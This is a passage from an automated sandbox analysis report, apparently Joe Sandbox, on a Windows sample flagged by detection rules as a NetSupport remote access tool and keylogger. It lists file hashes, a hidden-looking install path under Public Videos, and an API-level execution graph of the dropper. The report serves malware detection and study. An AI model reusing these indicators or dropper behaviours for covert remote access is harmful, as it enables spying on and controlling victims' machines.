                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.1835014337.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.1835014337.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:9
                                                                                    Start time:06:53:28
                                                                                    Start date:16/11/2024
                                                                                    Path:C:\Users\Public\Public\Videos\Video\bild.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\Public\Public\Videos\Video\bild.exe"
                                                                                    Imagebase:0x820000
                                                                                    File size:105'848 bytes
                                                                                    MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.1915079530.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.1915932796.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000000.1914004958.0000000000822000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.1914967107.0000000000822000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.1915886362.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.1915886362.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Disassembly

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:10.4%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:9.7%
                                                                                      Total number of Nodes:1492
                                                                                      Total number of Limit Nodes:24
                                                                                      execution_graph 23887 421b40 5 API calls 2 library calls 23854 419646 92 API calls 23888 41d74a 28 API calls 2 library calls 21974 419b4f 21975 419b59 __EH_prolog 21974->21975 22134 4012e7 21975->22134 21978 41a230 22224 41b8bc 21978->22224 21979 419b9b 21982 419c11 21979->21982 21983 419ba8 21979->21983 22041 419b87 21979->22041 21986 419cb0 GetDlgItemTextW 21982->21986 21992 419c2b 21982->21992 21987 419be4 21983->21987 21988 419bad 21983->21988 21984 41a25c 21990 41a265 SendDlgItemMessageW 21984->21990 21991 41a276 GetDlgItem SendMessageW 21984->21991 21985 41a24e SendMessageW 21985->21984 21986->21987 21989 419ce7 21986->21989 21993 419c05 KiUserCallbackDispatcher 21987->21993 21987->22041 21997 40d142 54 API calls 21988->21997 21988->22041 21995 419cff GetDlgItem 21989->21995 22131 419cf0 21989->22131 21990->21991 22242 418b8e GetCurrentDirectoryW 21991->22242 21996 40d142 54 API calls 21992->21996 21993->22041 21999 419d13 SendMessageW SendMessageW 21995->21999 22000 419d39 SetFocus 21995->22000 22001 419c4d SetDlgItemTextW 21996->22001 22002 419bc7 21997->22002 21998 41a2a8 GetDlgItem 22003 41a2c1 21998->22003 22004 41a2c7 SetWindowTextW 21998->22004 21999->22000 22006 419d49 22000->22006 22017 419d55 22000->22017 22005 419c5b 22001->22005 22264 401227 SHGetMalloc 22002->22264 22003->22004 22243 418fc8 GetClassNameW 22004->22243 22014 419c68 GetMessageW 22005->22014 22025 419c8e TranslateMessage DispatchMessageW 22005->22025 22005->22041 22011 40d142 54 API calls 22006->22011 22008 419bce 22012 419bd2 SetDlgItemTextW 22008->22012 22008->22041 22009 41a1d0 22013 40d142 54 API calls 22009->22013 22016 419d53 22011->22016 22012->22041 22018 41a1e0 SetDlgItemTextW 22013->22018 22014->22005 22014->22041 22144 41b70e GetDlgItem 22016->22144 22023 40d142 54 API calls 22017->22023 22020 41a1f4 22018->22020 22028 40d142 54 API calls 22020->22028 22027 419d87 22023->22027 22024 419daa 22152 409cce 22024->22152 22025->22005 22026 41a312 22030 41a342 22026->22030 22034 40d142 54 API calls 22026->22034 22031 403f5b _swprintf 51 API calls 22027->22031 22032 41a21d 22028->22032 22029 41aa45 91 API calls 22029->22026 22040 41aa45 91 API calls 22030->22040 22081 41a3fa 22030->22081 22031->22016 22035 40d142 54 API calls 22032->22035 22039 41a325 SetDlgItemTextW 22034->22039 22035->22041 22037 419de6 22158 419023 SetCurrentDirectoryW 22037->22158 22038 419ddf GetLastError 22038->22037 22046 40d142 54 API calls 22039->22046 22047 41a35d 22040->22047 22042 41a4aa 22043 41a4b3 EnableWindow 22042->22043 22044 41a4bc 22042->22044 22043->22044 22048 41a4d9 22044->22048 22273 4012a4 GetDlgItem EnableWindow 22044->22273 22050 41a339 SetDlgItemTextW 22046->22050 22056 41a36f 22047->22056 22069 41a394 22047->22069 22055 41a500 22048->22055 22062 41a4f8 SendMessageW 22048->22062 22049 419dfc 22053 419e05 GetLastError 22049->22053 22054 419e0f 22049->22054 22050->22030 22052 41a3ed 22058 41aa45 91 API calls 22052->22058 22053->22054 22066 419e9a 22054->22066 22067 419e27 GetTickCount 22054->22067 22111 419e8a 22054->22111 22055->22041 22063 40d142 54 API calls 22055->22063 22271 41859c 6 API calls 22056->22271 22057 41a4cf 22274 4012a4 GetDlgItem EnableWindow 22057->22274 22058->22081 22060 41a388 22060->22069 22062->22055 22064 41a519 SetDlgItemTextW 22063->22064 22064->22041 22065 41a0d3 22177 4012c2 GetDlgItem ShowWindow 22065->22177 22071 419eb2 GetModuleFileNameW 22066->22071 22072 41a06e 22066->22072 22159 403f5b 22067->22159 22068 41a488 22272 41859c 6 API calls 22068->22272 22069->22052 22076 41aa45 91 API calls 22069->22076 22265 40de7c 73 API calls 22071->22265 22072->21987 22085 40d142 54 API calls 22072->22085 22075 40d142 54 API calls 22075->22081 22082 41a3c2 22076->22082 22077 41a0e3 22178 4012c2 GetDlgItem ShowWindow 22077->22178 22079 419e44 22162 4094f1 22079->22162 22080 41a4a7 22080->22042 22081->22042 22081->22068 22081->22075 22082->22052 22086 41a3cb DialogBoxParamW 22082->22086 22084 419edc 22088 403f5b _swprintf 51 API calls 22084->22088 22089 41a082 22085->22089 22086->21987 22086->22052 22087 41a0ed 22179 40d142 22087->22179 22093 419efe CreateFileMappingW 22088->22093 22090 403f5b _swprintf 51 API calls 22089->22090 22094 41a0a0 22090->22094 22097 419f60 GetCommandLineW 22093->22097 22098 419fdd __vswprintf_c_l 22093->22098 22110 40d142 54 API calls 22094->22110 22095 419e6a 22100 419e71 GetLastError 22095->22100 22101 419e78 22095->22101 22099 419f71 22097->22099 22102 419fe8 ShellExecuteExW 22098->22102 22266 4197e4 SHGetMalloc 22099->22266 22100->22101 22170 409437 22101->22170 22121 41a005 22102->22121 22104 41a10b SetDlgItemTextW GetDlgItem 22107 41a124 GetWindowLongW SetWindowLongW 22104->22107 22108 41a13c 22104->22108 22107->22108 22187 41aa45 22108->22187 22109 419f8d 22267 4197e4 SHGetMalloc 22109->22267 22110->21987 22111->22065 22111->22066 22115 419f99 22268 4197e4 SHGetMalloc 22115->22268 22116 41a048 22116->22072 22124 41a05e UnmapViewOfFile CloseHandle 22116->22124 22117 41aa45 91 API calls 22119 41a158 22117->22119 22212 41bc78 22119->22212 22120 419fa5 22269 40dfde 73 API calls ___scrt_get_show_window_mode 22120->22269 22121->22116 22127 41a034 Sleep 22121->22127 22124->22072 22126 419fbc MapViewOfFile 22126->22098 22127->22116 22127->22121 22131->21987 22131->22009 22135 4012f0 22134->22135 22136 401349 22134->22136 22138 401356 22135->22138 22275 40ced7 22135->22275 22293 40ceb0 GetWindowLongW SetWindowLongW 22136->22293 22138->21978 22138->21979 22138->22041 22141 401325 GetDlgItem 22141->22138 22142 401335 22141->22142 22142->22138 22143 40133b SetWindowTextW 22142->22143 22143->22138 22145 41b76a SendMessageW SendMessageW 22144->22145 22146 41b73a 22144->22146 22147 41b7c1 SendMessageW SendMessageW SendMessageW 22145->22147 22148 41b7a2 22145->22148 22149 41b745 ShowWindow SendMessageW SendMessageW 22146->22149 22150 41b80b SendMessageW 22147->22150 22151 41b7ec SendMessageW 22147->22151 22148->22147 22149->22145 22150->22024 22151->22150 22154 409cd8 22152->22154 22153 409d69 22155 409e86 9 API calls 22153->22155 22157 409d92 22153->22157 22154->22153 22154->22157 22307 409e86 22154->22307 22155->22157 22157->22037 22157->22038 22158->22049 22354 403f2e 22159->22354 22163 4094fb 22162->22163 22164 409565 CreateFileW 22163->22164 22165 409559 22163->22165 22164->22165 22166 4095b7 22165->22166 22167 40b275 2 API calls 22165->22167 22166->22095 22168 40959e 22167->22168 22168->22166 22169 4095a2 CreateFileW 22168->22169 22169->22166 22171 40946c 22170->22171 22172 40945b 22170->22172 22171->22111 22172->22171 22173 409467 22172->22173 22174 40946e 22172->22174 22433 4095ea 22173->22433 22438 4094a3 22174->22438 22177->22077 22178->22087 22180 40d172 22179->22180 22181 40d191 LoadStringW 22180->22181 22182 40d17b LoadStringW 22180->22182 22183 40d1a3 22181->22183 22182->22181 22182->22183 22184 40c91f 52 API calls 22183->22184 22185 40d1b1 SetDlgItemTextW 22184->22185 22186 4012c2 GetDlgItem ShowWindow 22185->22186 22186->22104 22188 41aa4f __EH_prolog 22187->22188 22189 41a14a 22188->22189 22453 4196ec 22188->22453 22189->22117 22192 4196ec ExpandEnvironmentStringsW 22201 41aa86 _wcsrchr 22192->22201 22193 41ad86 SetWindowTextW 22193->22201 22198 41ab77 SetFileAttributesW 22200 41ac32 GetFileAttributesW 22198->22200 22206 41ab6a ___scrt_get_show_window_mode 22198->22206 22202 41ac40 DeleteFileW 22200->22202 22200->22206 22201->22189 22201->22192 22201->22193 22204 41af50 GetDlgItem SetWindowTextW SendMessageW 22201->22204 22201->22206 22208 41af92 SendMessageW 22201->22208 22457 410b12 CompareStringW 22201->22457 22458 418b8e GetCurrentDirectoryW 22201->22458 22459 40a1a9 7 API calls 22201->22459 22462 40a132 FindClose 22201->22462 22463 419844 69 API calls ___std_exception_copy 22201->22463 22464 4220de 22201->22464 22202->22206 22204->22201 22206->22198 22206->22200 22206->22201 22207 403f5b _swprintf 51 API calls 22206->22207 22460 40b100 52 API calls 2 library calls 22206->22460 22461 40a1a9 7 API calls 22206->22461 22209 41ac75 GetFileAttributesW 22207->22209 22208->22201 22209->22206 22210 41ac86 MoveFileW 22209->22210 22210->22206 22211 41ac9e MoveFileExW 22210->22211 22211->22206 22213 41bc82 __EH_prolog 22212->22213 22488 40f165 69 API calls 22213->22488 22215 41bcb3 22489 405bb7 69 API calls 22215->22489 22217 41bcd1 22490 407b10 74 API calls 2 library calls 22217->22490 22219 41bd15 22491 407c84 22219->22491 22221 41bd24 22500 407ba0 22221->22500 22225 41b8c9 22224->22225 23029 418ac0 22225->23029 22228 41a236 22228->21984 22228->21985 22229 41b8d6 GetWindow 22229->22228 22235 41b8f2 22229->22235 22230 41b8ff GetClassNameW 23034 410b12 CompareStringW 22230->23034 22232 41b927 GetWindowLongW 22233 41b988 GetWindow 22232->22233 22234 41b937 SendMessageW 22232->22234 22233->22228 22233->22235 22234->22233 22236 41b94d GetObjectW 22234->22236 22235->22228 22235->22230 22235->22232 22235->22233 23035 418b22 GetDC GetDeviceCaps ReleaseDC 22236->23035 22238 41b962 23036 418adf GetDC GetDeviceCaps ReleaseDC 22238->23036 23037 418cf3 8 API calls ___scrt_get_show_window_mode 22238->23037 22241 41b972 SendMessageW DeleteObject 22241->22233 22242->21998 22244 418fe9 22243->22244 22250 41900e 22243->22250 23040 410b12 CompareStringW 22244->23040 22245 419013 SHAutoComplete 22246 41901c 22245->22246 22251 419485 22246->22251 22248 418ffc 22249 419000 FindWindowExW 22248->22249 22248->22250 22249->22250 22250->22245 22250->22246 22252 41948f __EH_prolog 22251->22252 22253 40137e 75 API calls 22252->22253 22254 4194b1 22253->22254 23041 401edd 22254->23041 22257 4194cb 22260 40162e 79 API calls 22257->22260 22258 4194da 22259 4018f6 127 API calls 22258->22259 22262 4194fc __vswprintf_c_l ___std_exception_copy 22259->22262 22261 4194d6 22260->22261 22261->22026 22261->22029 22263 40162e 79 API calls 22262->22263 22263->22261 22264->22008 22265->22084 22266->22109 22267->22115 22268->22120 22269->22126 22271->22060 22272->22080 22273->22057 22274->22048 22294 40c88e 22275->22294 22277 40cefd GetWindowRect GetClientRect 22278 40cff2 22277->22278 22281 40cf57 22277->22281 22279 40d034 GetSystemMetrics GetWindow 22278->22279 22280 40cffc GetWindowTextW 22278->22280 22288 40d054 22279->22288 22297 40c91f 22280->22297 22281->22279 22285 40cfb8 GetWindowLongW 22281->22285 22283 401312 22283->22138 22283->22141 22284 40d028 SetWindowTextW 22284->22279 22287 40cfe2 GetWindowRect 22285->22287 22286 40d060 GetWindowTextW 22286->22288 22287->22278 22288->22283 22288->22286 22289 40c91f 52 API calls 22288->22289 22290 40d0a6 GetWindowRect 22288->22290 22291 40d11b GetWindow 22288->22291 22292 40d093 SetWindowTextW 22289->22292 22290->22291 22291->22283 22291->22288 22292->22288 22293->22138 22295 40c91f 52 API calls 22294->22295 22296 40c8b6 _wcschr 22295->22296 22296->22277 22298 40c929 22297->22298 22301 40c99d _strlen 22298->22301 22304 40c9fb _wcschr _wcsrchr 22298->22304 22305 410905 WideCharToMultiByte 22298->22305 22306 410905 WideCharToMultiByte 22301->22306 22302 40c9c8 _strlen 22303 403f5b _swprintf 51 API calls 22302->22303 22303->22304 22304->22284 22305->22301 22306->22302 22308 409e93 22307->22308 22309 409eb7 22308->22309 22311 409eaa CreateDirectoryW 22308->22311 22328 409dff 22309->22328 22311->22309 22313 409eea 22311->22313 22317 409ef9 22313->22317 22320 40a0c3 22313->22320 22314 409efd GetLastError 22314->22317 22317->22154 22318 409ed3 22318->22314 22319 409ed7 CreateDirectoryW 22318->22319 22319->22313 22319->22314 22341 41cec0 22320->22341 22323 40a113 22323->22317 22324 40a0e6 22325 40b275 2 API calls 22324->22325 22326 40a0fa 22325->22326 22326->22323 22327 40a0fe SetFileAttributesW 22326->22327 22327->22323 22343 409e13 22328->22343 22331 40b275 22332 40b282 22331->22332 22340 40b28c 22332->22340 22351 40b40f CharUpperW 22332->22351 22334 40b29b 22352 40b43b CharUpperW 22334->22352 22336 40b2aa 22337 40b325 GetCurrentDirectoryW 22336->22337 22338 40b2ae 22336->22338 22337->22340 22353 40b40f CharUpperW 22338->22353 22340->22318 22342 40a0d0 SetFileAttributesW 22341->22342 22342->22323 22342->22324 22344 41cec0 22343->22344 22345 409e20 GetFileAttributesW 22344->22345 22346 409e31 22345->22346 22347 409e08 22345->22347 22348 40b275 2 API calls 22346->22348 22347->22314 22347->22331 22349 409e45 22348->22349 22349->22347 22350 409e49 GetFileAttributesW 22349->22350 22350->22347 22351->22334 22352->22336 22353->22340 22355 403f45 ___scrt_initialize_default_local_stdio_options 22354->22355 22358 4234dd 22355->22358 22361 4221bb 22358->22361 22362 4221e3 22361->22362 22363 4221fb 22361->22363 22378 425e3e 20 API calls _abort 22362->22378 22363->22362 22364 422203 22363->22364 22380 422636 22364->22380 22367 4221e8 22379 425d1d 26 API calls _abort 22367->22379 22371 41d783 _ValidateLocalCookies 5 API calls 22373 403f4f 22371->22373 22372 42228b 22389 42283c 51 API calls 3 library calls 22372->22389 22373->22079 22376 4221f3 22376->22371 22377 422296 22390 4226b9 20 API calls _free 22377->22390 22378->22367 22379->22376 22381 422653 22380->22381 22382 422213 22380->22382 22381->22382 22391 42631f GetLastError 22381->22391 22388 422601 20 API calls 2 library calls 22382->22388 22384 422674 22411 42646e 38 API calls __fassign 22384->22411 22386 42268d 22412 42649b 38 API calls __fassign 22386->22412 22388->22372 22389->22377 22390->22376 22392 426335 22391->22392 22396 42633b 22391->22396 22413 4278f8 11 API calls 2 library calls 22392->22413 22398 42638a SetLastError 22396->22398 22414 425a8d 22396->22414 22397 426355 22421 4259c2 22397->22421 22398->22384 22401 42636a 22401->22397 22403 426371 22401->22403 22402 42635b 22404 426396 SetLastError 22402->22404 22428 426191 20 API calls _abort 22403->22428 22429 425a4a 38 API calls _abort 22404->22429 22407 42637c 22409 4259c2 _free 20 API calls 22407->22409 22410 426383 22409->22410 22410->22398 22410->22404 22411->22386 22412->22382 22413->22396 22419 425a9a _abort 22414->22419 22415 425ada 22431 425e3e 20 API calls _abort 22415->22431 22416 425ac5 RtlAllocateHeap 22417 425ad8 22416->22417 22416->22419 22417->22397 22427 42794e 11 API calls 2 library calls 22417->22427 22419->22415 22419->22416 22430 4246ca 7 API calls 2 library calls 22419->22430 22422 4259f6 _free 22421->22422 22423 4259cd RtlFreeHeap 22421->22423 22422->22402 22423->22422 22424 4259e2 22423->22424 22432 425e3e 20 API calls _abort 22424->22432 22426 4259e8 GetLastError 22426->22422 22427->22401 22428->22407 22430->22419 22431->22417 22432->22426 22434 4095f3 22433->22434 22435 4095f7 22433->22435 22434->22171 22435->22434 22444 409dac 22435->22444 22439 4094cd 22438->22439 22440 4094af 22438->22440 22441 4094ec 22439->22441 22452 406d80 67 API calls 22439->22452 22440->22439 22442 4094bb CloseHandle 22440->22442 22441->22171 22442->22439 22445 41cec0 22444->22445 22446 409db9 DeleteFileW 22445->22446 22447 409611 22446->22447 22448 409dcc 22446->22448 22447->22171 22449 40b275 2 API calls 22448->22449 22450 409de0 22449->22450 22450->22447 22451 409de4 DeleteFileW 22450->22451 22451->22447 22452->22441 22454 4196f6 22453->22454 22455 4197a9 ExpandEnvironmentStringsW 22454->22455 22456 4197cc 22454->22456 22455->22456 22456->22201 22457->22201 22458->22201 22459->22201 22460->22206 22461->22206 22462->22201 22463->22201 22465 425aea 22464->22465 22466 425b02 22465->22466 22467 425af7 22465->22467 22469 425b0a 22466->22469 22475 425b13 _abort 22466->22475 22477 4259fc 22467->22477 22470 4259c2 _free 20 API calls 22469->22470 22473 425aff 22470->22473 22471 425b18 22484 425e3e 20 API calls _abort 22471->22484 22472 425b3d HeapReAlloc 22472->22473 22472->22475 22473->22201 22475->22471 22475->22472 22485 4246ca 7 API calls 2 library calls 22475->22485 22478 425a3a 22477->22478 22482 425a0a _abort 22477->22482 22487 425e3e 20 API calls _abort 22478->22487 22479 425a25 RtlAllocateHeap 22481 425a38 22479->22481 22479->22482 22481->22473 22482->22478 22482->22479 22486 4246ca 7 API calls 2 library calls 22482->22486 22484->22473 22485->22475 22486->22482 22487->22481 22488->22215 22489->22217 22490->22219 22492 407c8e 22491->22492 22496 407cf8 22492->22496 22526 40a145 22492->22526 22495 407d62 22499 407da4 22495->22499 22532 406d0d 67 API calls 22495->22532 22496->22495 22497 40a145 8 API calls 22496->22497 22504 40820b 22496->22504 22497->22496 22499->22221 22501 407bb5 22500->22501 22502 407bae 22500->22502 22503 410e21 79 API calls 22502->22503 22503->22501 22505 408215 __EH_prolog 22504->22505 22533 40137e 22505->22533 22507 408230 22541 409ba2 22507->22541 22513 40825f 22661 40162e 22513->22661 22514 40825b 22514->22513 22522 40a145 8 API calls 22514->22522 22524 4082fa 22514->22524 22665 40b6cb CompareStringW 22514->22665 22518 40835a 22564 401e8e 22518->22564 22522->22514 22560 4083a3 22524->22560 22525 408365 22525->22513 22568 403a20 22525->22568 22578 408409 22525->22578 22527 40a15a 22526->22527 22528 40a15e 22527->22528 23017 40a273 22527->23017 22528->22492 22530 40a16e 22530->22528 22531 40a173 FindClose 22530->22531 22531->22528 22532->22499 22534 401383 __EH_prolog 22533->22534 22667 40c413 22534->22667 22536 4013ba 22540 401413 ___scrt_get_show_window_mode 22536->22540 22673 41cdae 22536->22673 22540->22507 22542 409bad 22541->22542 22544 408246 22542->22544 22698 406e66 67 API calls 22542->22698 22544->22513 22545 4019b1 22544->22545 22546 4019bb __EH_prolog 22545->22546 22553 4019fd 22546->22553 22559 4019e4 22546->22559 22699 40135c 22546->22699 22548 401b16 22702 406d0d 67 API calls 22548->22702 22550 403a20 90 API calls 22555 401b6d 22550->22555 22551 401b26 22551->22550 22551->22559 22552 401bb7 22558 401bea 22552->22558 22552->22559 22703 406d0d 67 API calls 22552->22703 22553->22548 22553->22551 22553->22559 22555->22552 22556 403a20 90 API calls 22555->22556 22556->22555 22557 403a20 90 API calls 22557->22558 22558->22557 22558->22559 22559->22514 22561 4083b0 22560->22561 22721 40ffb8 GetSystemTime SystemTimeToFileTime 22561->22721 22563 408314 22563->22518 22666 4106c8 65 API calls 22563->22666 22565 401e93 __EH_prolog 22564->22565 22566 401ec7 22565->22566 22723 4018f6 22565->22723 22566->22525 22569 403a30 22568->22569 22570 403a2c 22568->22570 22571 403a5d 22569->22571 22572 403a4f 22569->22572 22570->22525 22944 40276c 90 API calls 3 library calls 22571->22944 22573 403a8f 22572->22573 22943 403203 78 API calls 3 library calls 22572->22943 22573->22525 22576 403a5b 22576->22573 22945 401fd2 67 API calls 22576->22945 22579 408413 __EH_prolog 22578->22579 22580 40844f 22579->22580 22611 408453 22579->22611 22974 4177e7 93 API calls 22579->22974 22581 408478 22580->22581 22586 4084ff 22580->22586 22580->22611 22582 40849a 22581->22582 22581->22611 22975 407a2f 151 API calls 22581->22975 22582->22611 22976 4177e7 93 API calls 22582->22976 22586->22611 22946 405d98 22586->22946 22588 40858c 22588->22611 22954 4080f8 22588->22954 22591 4086e9 22592 40a145 8 API calls 22591->22592 22595 40874d 22591->22595 22592->22595 22594 40c57d 73 API calls 22598 4087a7 _memcmp 22594->22598 22958 407c11 22595->22958 22596 4088d1 22597 4089a0 22596->22597 22603 40891f 22596->22603 22602 4089fb 22597->22602 22614 4089ab 22597->22614 22598->22594 22598->22596 22599 4088ca 22598->22599 22598->22611 22977 4080a6 75 API calls 22598->22977 22978 406d0d 67 API calls 22598->22978 22979 406d0d 67 API calls 22599->22979 22613 40898f 22602->22613 22982 407f88 89 API calls 22602->22982 22606 409dff 4 API calls 22603->22606 22603->22613 22604 408fb5 22608 409437 72 API calls 22604->22608 22605 4089f9 22607 409437 72 API calls 22605->22607 22610 408956 22606->22610 22607->22611 22608->22611 22610->22613 22980 409161 89 API calls 22610->22980 22611->22525 22612 408a64 22612->22604 22625 408acd 22612->22625 22983 40971a 22612->22983 22613->22605 22613->22612 22614->22605 22981 407dc4 93 API calls ___InternalCxxFrameHandler 22614->22981 22615 40a6a9 8 API calls 22618 408b1c 22615->22618 22621 40a6a9 8 API calls 22618->22621 22620 408aa5 22620->22625 22987 401f18 67 API calls 22620->22987 22630 408b32 22621->22630 22623 408abb 22988 406f67 68 API calls 22623->22988 22625->22615 22626 408d22 22633 408d34 22626->22633 22634 408d48 22626->22634 22651 408c4e 22626->22651 22627 408c1e 22629 408c8e 22627->22629 22631 408c2e 22627->22631 22628 408bd5 22628->22626 22628->22627 22632 4080f8 CharUpperW 22629->22632 22630->22628 22964 409869 22630->22964 22636 408c72 22631->22636 22642 408c3c 22631->22642 22637 408ca9 22632->22637 22638 4090d0 120 API calls 22633->22638 22639 411fa9 68 API calls 22634->22639 22636->22651 22990 4077d4 101 API calls 22636->22990 22645 408cd2 22637->22645 22646 408cd9 22637->22646 22637->22651 22638->22651 22640 408d61 22639->22640 22643 411c40 120 API calls 22640->22643 22989 401f18 67 API calls 22642->22989 22643->22651 22991 407586 77 API calls ___InternalCxxFrameHandler 22645->22991 22992 40900e 85 API calls __EH_prolog 22646->22992 22649 408e6c 22649->22604 22650 408edb 22649->22650 22994 409b6a SetEndOfFile 22649->22994 22969 409a12 22650->22969 22651->22649 22993 401f18 67 API calls 22651->22993 22655 408f35 22656 4094a3 68 API calls 22655->22656 22657 408f40 22656->22657 22657->22604 22658 40a0c3 4 API calls 22657->22658 22659 408f9f 22658->22659 22659->22604 22995 401f18 67 API calls 22659->22995 22662 401640 22661->22662 23016 40c4b6 79 API calls 22662->23016 22665->22514 22666->22518 22668 40c41d __EH_prolog 22667->22668 22669 41cdae new 8 API calls 22668->22669 22671 40c460 22669->22671 22670 41cdae new 8 API calls 22672 40c484 22670->22672 22671->22670 22672->22536 22674 41cdb3 ___std_exception_copy 22673->22674 22675 401400 22674->22675 22685 4246ca 7 API calls 2 library calls 22674->22685 22686 41d83a RaiseException __CxxThrowException@8 new 22674->22686 22687 41d81d RaiseException Concurrency::cancel_current_task __CxxThrowException@8 22674->22687 22675->22540 22679 40ac66 22675->22679 22680 40ac70 __EH_prolog 22679->22680 22688 40ddc2 73 API calls 22680->22688 22682 40ac82 22689 40ad7e 22682->22689 22685->22674 22688->22682 22690 40ad90 ___scrt_get_show_window_mode 22689->22690 22693 40fce6 22690->22693 22696 40fca6 GetCurrentProcess GetProcessAffinityMask 22693->22696 22697 40acf8 22696->22697 22697->22540 22698->22544 22704 401705 22699->22704 22701 401378 22701->22553 22702->22559 22703->22558 22705 40171b 22704->22705 22716 401773 __vswprintf_c_l 22704->22716 22706 401744 22705->22706 22717 406dd3 67 API calls __vswprintf_c_l 22705->22717 22708 40179a 22706->22708 22713 401760 ___std_exception_copy 22706->22713 22710 4220de 22 API calls 22708->22710 22709 40173a 22718 406e0b 68 API calls 22709->22718 22712 4017a1 22710->22712 22712->22716 22720 406e0b 68 API calls 22712->22720 22713->22716 22719 406e0b 68 API calls 22713->22719 22716->22701 22717->22709 22718->22706 22719->22716 22720->22716 22722 40ffe8 __vswprintf_c_l 22721->22722 22722->22563 22724 4018fb __EH_prolog 22723->22724 22725 40190f 22724->22725 22726 401934 22724->22726 22728 401964 22724->22728 22725->22566 22727 403a20 90 API calls 22726->22727 22727->22725 22732 403e69 22728->22732 22736 403e72 22732->22736 22733 403a20 90 API calls 22733->22736 22734 401980 22734->22725 22737 401da1 22734->22737 22736->22733 22736->22734 22749 40f8f2 22736->22749 22738 401dab __EH_prolog 22737->22738 22757 403aa3 22738->22757 22740 401dd4 22741 401705 69 API calls 22740->22741 22742 401e5b 22740->22742 22743 401deb 22741->22743 22742->22725 22787 40187c 69 API calls 22743->22787 22745 401e03 22747 401e0f 22745->22747 22788 4106e9 MultiByteToWideChar 22745->22788 22789 40187c 69 API calls 22747->22789 22750 40f8f9 22749->22750 22751 40f914 22750->22751 22755 406dce RaiseException __CxxThrowException@8 22750->22755 22753 40f925 SetThreadExecutionState 22751->22753 22756 406dce RaiseException __CxxThrowException@8 22751->22756 22753->22736 22755->22751 22756->22753 22758 403aad __EH_prolog 22757->22758 22759 403ac3 22758->22759 22760 403adf 22758->22760 22826 406d0d 67 API calls 22759->22826 22762 403d1f 22760->22762 22765 403b0b 22760->22765 22845 406d0d 67 API calls 22762->22845 22764 403ace 22764->22740 22765->22764 22790 410be0 22765->22790 22767 403b43 22794 411fa9 22767->22794 22769 403b8c 22770 403c17 22769->22770 22786 403b83 22769->22786 22829 40c57d 22769->22829 22807 40a6a9 22770->22807 22771 403b88 22771->22769 22828 401fb8 69 API calls 22771->22828 22773 403b78 22827 406d0d 67 API calls 22773->22827 22774 403b5a 22774->22769 22774->22771 22774->22773 22776 403c2a 22780 403ca5 22776->22780 22781 403c9b 22776->22781 22835 411c40 22780->22835 22811 4090d0 22781->22811 22784 403ca3 22784->22786 22844 401f18 67 API calls 22784->22844 22822 410e21 22786->22822 22787->22745 22788->22747 22789->22742 22791 410bea __EH_prolog 22790->22791 22846 40fb02 22791->22846 22793 410cea 22793->22767 22795 411fb8 22794->22795 22797 411fc2 22794->22797 22865 406e0b 68 API calls 22795->22865 22798 412002 22797->22798 22800 412007 ___std_exception_copy 22797->22800 22806 412060 ___scrt_get_show_window_mode 22797->22806 22867 4200ca RaiseException 22798->22867 22801 412117 22800->22801 22803 41203c 22800->22803 22800->22806 22868 4200ca RaiseException 22801->22868 22866 411eca 68 API calls 3 library calls 22803->22866 22804 41213a 22806->22774 22808 40a6b6 22807->22808 22810 40a6c0 22807->22810 22809 41cdae new 8 API calls 22808->22809 22809->22810 22810->22776 22812 4090da __EH_prolog 22811->22812 22869 407c6b 22812->22869 22815 40135c 69 API calls 22816 4090ec 22815->22816 22872 40c658 22816->22872 22818 409146 22818->22784 22820 40c658 115 API calls 22821 4090fe 22820->22821 22821->22818 22821->22820 22881 40c810 91 API calls __vswprintf_c_l 22821->22881 22823 410e43 22822->22823 22891 40fc30 22823->22891 22825 410e5c 22825->22764 22826->22764 22827->22786 22828->22769 22830 40c5b0 22829->22830 22831 40c59e 22829->22831 22908 406195 73 API calls 22830->22908 22907 406195 73 API calls 22831->22907 22834 40c5a8 22834->22770 22836 411c72 22835->22836 22837 411c49 22835->22837 22843 411c66 22836->22843 22923 41421d 120 API calls 2 library calls 22836->22923 22838 411c68 22837->22838 22840 411c5e 22837->22840 22837->22843 22922 414f35 115 API calls 22838->22922 22909 415984 22840->22909 22843->22784 22844->22786 22845->22764 22862 41cdf0 22846->22862 22848 40fb0c EnterCriticalSection 22849 40fb30 22848->22849 22850 40fb4e 22848->22850 22853 41cdae new 8 API calls 22849->22853 22851 40fb95 LeaveCriticalSection 22850->22851 22852 40fb66 22850->22852 22856 40fba1 22851->22856 22855 41cdae new 8 API calls 22852->22855 22854 40fb3a 22853->22854 22854->22850 22863 40f930 71 API calls 22854->22863 22857 40fb70 22855->22857 22856->22793 22859 40fb8a LeaveCriticalSection 22857->22859 22864 40f930 71 API calls 22857->22864 22859->22856 22861 40fb88 22861->22859 